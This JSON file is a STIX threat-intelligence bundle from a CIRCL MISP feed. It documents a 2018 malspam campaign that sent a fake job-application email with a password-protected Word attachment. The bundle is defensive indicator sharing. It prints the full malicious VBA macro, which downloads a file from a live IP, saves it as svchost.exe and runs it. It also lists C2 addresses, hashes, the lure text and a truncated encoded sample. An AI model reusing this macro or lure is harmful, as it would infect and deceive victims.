misp-circl-feed/feeds/circl/stix-2.1/5b07b46a-bc20-4e71-8a39-4aa0950d210f.json

767 lines
120 KiB
JSON
Raw Normal View History

2023-04-21 14:44:17 +00:00
{
"type": "bundle",
"id": "bundle--5b07b46a-bc20-4e71-8a39-4aa0950d210f",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T11:16:57.000Z",
"modified": "2018-05-25T11:16:57.000Z",
"name": "CIRCL",
"identity_class": "organization"
},
{
"type": "grouping",
"spec_version": "2.1",
"id": "grouping--5b07b46a-bc20-4e71-8a39-4aa0950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T11:16:57.000Z",
"modified": "2018-05-25T11:16:57.000Z",
"name": "Malspam 2018-05-25: \"Regarding a job.\"",
"context": "suspicious-activity",
"object_refs": [
"indicator--5b07b4ac-5770-47f1-a145-4cc1950d210f",
"indicator--5b07b4ac-e5d4-4d38-8c1d-4627950d210f",
"x-misp-attribute--5b07b594-659c-4b2d-8b54-46af950d210f",
"observed-data--5b07b5e7-eae8-4e92-a0dc-424d950d210f",
"email-message--5b07b5e7-eae8-4e92-a0dc-424d950d210f",
"indicator--5b07cffc-bb94-4618-863f-49f0950d210f",
"indicator--5b07cffc-ecc4-49ca-bfb9-4343950d210f",
"indicator--5b07cffd-ec38-4319-831f-4087950d210f",
"indicator--5b07cffd-c580-405e-ba42-42a5950d210f",
"indicator--5b07cffe-5ac8-4d6e-8b6f-421e950d210f",
"indicator--5b07cffe-7be4-4dee-a711-4a45950d210f",
"indicator--5b07cfff-7998-4bf2-b7a8-4b11950d210f",
"indicator--5b07d000-9bfc-4d22-9a8a-4b51950d210f",
"indicator--5b07d000-96b0-4aa4-bee5-4fd0950d210f",
"indicator--5b07d001-7d14-4fbf-a05e-4b65950d210f",
"indicator--5b07d001-c034-45d8-ac30-469c950d210f",
"indicator--5b07d0ac-6840-4589-9eb7-496b950d210f",
"indicator--5b07d0ad-2990-49ca-82b5-4121950d210f",
"indicator--5b07d0ae-ed48-4869-9cd6-4c35950d210f",
"indicator--5b07d0af-b274-422d-85a0-4bdf950d210f",
"indicator--5b07d0af-92cc-4848-815d-48ce950d210f",
"indicator--5b07d0b0-9434-4888-86fc-4fc9950d210f",
"indicator--5b07d0b1-c940-4641-b73f-4263950d210f",
"indicator--5b07d0b2-a290-4484-a7aa-4cb2950d210f",
"indicator--5b07d0b3-0f64-4988-967c-40b2950d210f",
"indicator--5b07d0b4-94bc-4902-b6bf-423e950d210f",
"indicator--5b07d0b5-b87c-4202-bd71-4e66950d210f",
"indicator--5b07b502-35d0-4490-8947-4da6950d210f",
"indicator--5b07b547-3fd4-451f-b654-4fec950d210f",
"x-misp-object--19b89da3-fd67-4435-8c0a-e43223f4a68c",
2024-04-05 12:15:17 +00:00
"relationship--b4bd940e-104e-4f1b-be46-c4ecb9a0da7f"
2023-04-21 14:44:17 +00:00
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"misp-galaxy:banker=\"Feodo\"",
"circl:incident-classification=\"malware\""
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07b4ac-5770-47f1-a145-4cc1950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T08:58:10.000Z",
"modified": "2018-05-25T08:58:10.000Z",
"description": "2nd stage location",
"pattern": "[url:value = 'http://185.189.58.180/~filehost/background.png']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T08:58:10Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07b4ac-e5d4-4d38-8c1d-4627950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T08:58:04.000Z",
"modified": "2018-05-25T08:58:04.000Z",
"description": "2nd stage location",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '185.189.58.180']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T08:58:04Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5b07b594-659c-4b2d-8b54-46af950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T07:04:52.000Z",
"modified": "2018-05-25T07:04:52.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_comment": "contained macro",
"x_misp_type": "text",
"x_misp_value": "Rem Attribute VBA_ModuleType=VBADocumentModule\r\nOption VBASupport 1\r\nPrivate Sub Document_Open()\r\n\r\nDim WinHttpReq As Object\r\nSet WinHttpReq = CreateObject(\"Microsoft.XMLHTTP\")\r\n \r\nWinHttpReq.Open \"GET\", \"http://185.189.58.180/~filehost/background.png\", False, \"username\", \"password\"\r\nWinHttpReq.send\r\n\r\nDim first5 As String\r\n Dim second5 As String\r\n Dim last5 As String\r\n first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)\r\n second5 = ChrW(97) & ChrW(109)\r\n last5 = first5 + second5\r\n\r\nxyuhjnx = WinHttpReq.responseBody\r\nIf WinHttpReq.Status = 200 Then\r\n Set oStream = CreateObject(last5)\r\n oStream.Open\r\n oStream.Type = Val(\"1FFF\")\r\n oStream.Write WinHttpReq.responseBody\r\n \r\n Dim first6 As String\r\n Dim last6 As String\r\n first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)\r\n last6 = first6\r\n \r\n oStream.SaveToFile Environ(\"Temp\") + \"\\svchost.exe\", Val(\"2FFF\")\r\n oStream.Close\r\n \r\nEnd If\r\n \r\nCall Shell(Environ(\"Temp\") + \"\\svchost.exe\", 0)\r\n\r\nMsgBox \"The operating system you are using does not support secured documents. Please re-open the document on a different computer. The Microsoft Word will exit now.\"\r\n\r\nActiveDocument.Close\r\n\r\nEnd Sub"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5b07b5e7-eae8-4e92-a0dc-424d950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T07:06:15.000Z",
"modified": "2018-05-25T07:06:15.000Z",
"first_observed": "2018-05-25T07:06:15Z",
"last_observed": "2018-05-25T07:06:15Z",
"number_observed": 1,
"object_refs": [
"email-message--5b07b5e7-eae8-4e92-a0dc-424d950d210f"
],
"labels": [
"misp:type=\"email-body\"",
"misp:category=\"Payload delivery\""
]
},
{
"type": "email-message",
"spec_version": "2.1",
"id": "email-message--5b07b5e7-eae8-4e92-a0dc-424d950d210f",
"is_multipart": false,
"body": "Hello there! I hope you are well! \r\n\r\nI'm very interested in a opening.\r\nSee my attached CV and get back to me as soon as possible!\r\n\r\nThe file is password protected to protect against identity theft. The password is \"resume\" \r\nThank you! \r\n\r\nHerschel"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07cffc-bb94-4618-863f-49f0950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T08:57:32.000Z",
"modified": "2018-05-25T08:57:32.000Z",
"description": "POST",
"pattern": "[url:value = 'http://80.82.115.164:4143/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T08:57:32Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07cffc-ecc4-49ca-bfb9-4343950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T08:57:32.000Z",
"modified": "2018-05-25T08:57:32.000Z",
"description": "POST",
"pattern": "[url:value = 'http://213.108.33.44/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T08:57:32Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07cffd-ec38-4319-831f-4087950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T08:57:33.000Z",
"modified": "2018-05-25T08:57:33.000Z",
"description": "POST",
"pattern": "[url:value = 'http://27.254.150.53:4143/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T08:57:33Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07cffd-c580-405e-ba42-42a5950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T08:57:33.000Z",
"modified": "2018-05-25T08:57:33.000Z",
"description": "POST",
"pattern": "[url:value = 'http://189.51.144.3/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T08:57:33Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07cffe-5ac8-4d6e-8b6f-421e950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T08:57:34.000Z",
"modified": "2018-05-25T08:57:34.000Z",
"description": "POST",
"pattern": "[url:value = 'http://159.203.94.198:4143/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T08:57:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07cffe-7be4-4dee-a711-4a45950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T08:57:34.000Z",
"modified": "2018-05-25T08:57:34.000Z",
"description": "POST",
"pattern": "[url:value = 'http://178.62.39.238:443/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T08:57:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07cfff-7998-4bf2-b7a8-4b11950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T08:57:35.000Z",
"modified": "2018-05-25T08:57:35.000Z",
"description": "POST",
"pattern": "[url:value = 'http://178.62.253.139:4143/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T08:57:35Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07d000-9bfc-4d22-9a8a-4b51950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T08:57:36.000Z",
"modified": "2018-05-25T08:57:36.000Z",
"description": "POST",
"pattern": "[url:value = 'http://52.4.64.240:4143/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T08:57:36Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07d000-96b0-4aa4-bee5-4fd0950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T08:57:36.000Z",
"modified": "2018-05-25T08:57:36.000Z",
"description": "POST",
"pattern": "[url:value = 'http://186.103.199.252:4143/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T08:57:36Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07d001-7d14-4fbf-a05e-4b65950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T08:57:37.000Z",
"modified": "2018-05-25T08:57:37.000Z",
"description": "POST",
"pattern": "[url:value = 'http://71.244.60.231:4143/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T08:57:37Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07d001-c034-45d8-ac30-469c950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T08:57:37.000Z",
"modified": "2018-05-25T08:57:37.000Z",
"description": "POST",
"pattern": "[url:value = 'http://84.200.208.98/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T08:57:37Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07d0ac-6840-4589-9eb7-496b950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T09:00:28.000Z",
"modified": "2018-05-25T09:00:28.000Z",
"description": "C2 On port 4143",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '80.82.115.164' AND network-traffic:dst_port = '4143']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T09:00:28Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07d0ad-2990-49ca-82b5-4121950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T09:00:29.000Z",
"modified": "2018-05-25T09:00:29.000Z",
"description": "C2",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '213.108.33.44']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T09:00:29Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07d0ae-ed48-4869-9cd6-4c35950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T09:00:30.000Z",
"modified": "2018-05-25T09:00:30.000Z",
"description": "C2 On port 4143",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '27.254.150.53' AND network-traffic:dst_port = '4143']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T09:00:30Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07d0af-b274-422d-85a0-4bdf950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T09:00:31.000Z",
"modified": "2018-05-25T09:00:31.000Z",
"description": "C2",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '189.51.144.3']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T09:00:31Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07d0af-92cc-4848-815d-48ce950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T09:00:31.000Z",
"modified": "2018-05-25T09:00:31.000Z",
"description": "C2 On port 4143",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '159.203.94.198' AND network-traffic:dst_port = '4143']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T09:00:31Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07d0b0-9434-4888-86fc-4fc9950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T09:00:32.000Z",
"modified": "2018-05-25T09:00:32.000Z",
"description": "C2 On port 443",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '178.62.39.238' AND network-traffic:dst_port = '443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T09:00:32Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07d0b1-c940-4641-b73f-4263950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T09:00:33.000Z",
"modified": "2018-05-25T09:00:33.000Z",
"description": "C2 On port 4143",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '178.62.253.139' AND network-traffic:dst_port = '4143']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T09:00:33Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07d0b2-a290-4484-a7aa-4cb2950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T09:00:34.000Z",
"modified": "2018-05-25T09:00:34.000Z",
"description": "C2 On port 4143",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '52.4.64.240' AND network-traffic:dst_port = '4143']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T09:00:34Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07d0b3-0f64-4988-967c-40b2950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T09:00:35.000Z",
"modified": "2018-05-25T09:00:35.000Z",
"description": "C2 On port 4143",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '71.244.60.231' AND network-traffic:dst_port = '4143']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T09:00:35Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07d0b4-94bc-4902-b6bf-423e950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T09:00:36.000Z",
"modified": "2018-05-25T09:00:36.000Z",
"description": "C2 On port 4143",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '186.103.199.252' AND network-traffic:dst_port = '4143']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T09:00:36Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07d0b5-b87c-4202-bd71-4e66950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T09:00:37.000Z",
"modified": "2018-05-25T09:00:37.000Z",
"description": "C2",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '84.200.208.98']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2018-05-25T09:00:37Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5b07b502-35d0-4490-8947-4da6950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2018-05-25T07:02:26.000Z",
"modified": "2018-05-25T07:02:26.000Z",
"description": "document password: resume (as specified in the initial mail)",
"pattern": "[file:hashes.MD5 = 'fc3a527586746a950d51e0041f09266a' AND file:hashes.SHA1 = 'fc56a18310be9c7312dceb2084df03b0282d3f37' AND file:hashes.SHA256 = 'd5a8138d22083159836485ff0d9be918902b02cbc0609a67f2c5ff0f2e7c4431' AND file:name = 'scan_38917.doc' AND file:size = '37888' AND (file:content_ref.payload_bin = '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